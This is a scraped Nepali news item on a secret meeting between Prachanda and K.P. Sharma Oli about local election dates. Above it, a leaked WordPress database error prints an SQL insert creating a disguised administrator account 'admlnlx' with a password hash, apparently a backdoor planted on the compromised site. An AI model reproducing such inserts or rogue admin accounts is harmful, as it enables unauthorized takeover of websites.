WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bwgu2zV9KCPKlRguunYo6XilmA2dSd/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 09:15:06', '', 'admlnlx', 'admlnlx')
काठमाडौ,माघ २८-
प्रधानमन्त्री तथा नेकपा माओवादी केन्द्रका अध्यक्ष पुष्पकमल दाहाल ‘प्रचण्ड’ र एमाले अध्यक्ष केपी शर्मा ओलीबीच शुक्रबार गोप्य भेटवार्ता भएको छ । ललितपुरस्थित हात्तीवनमा माओवादी नेता नारायणकाजी श्रेष्ठ निवासमा करिब एक घण्टा छलफल भएको हो ।
श्रेष्ठ निवास पुगेका ओलीले प्रचण्डलाई स्थानीय निर्वाचनको मिति घोषणा गर्न आग्रह गरेका थिए । प्रचण्डले अब निर्वाचनको मिति छिट्टै घोषणा हुने र संविधान संशोधन टुंग्याउँदा मधेसमा सहज वातावरण हुने जवाफ दिएका थिए ।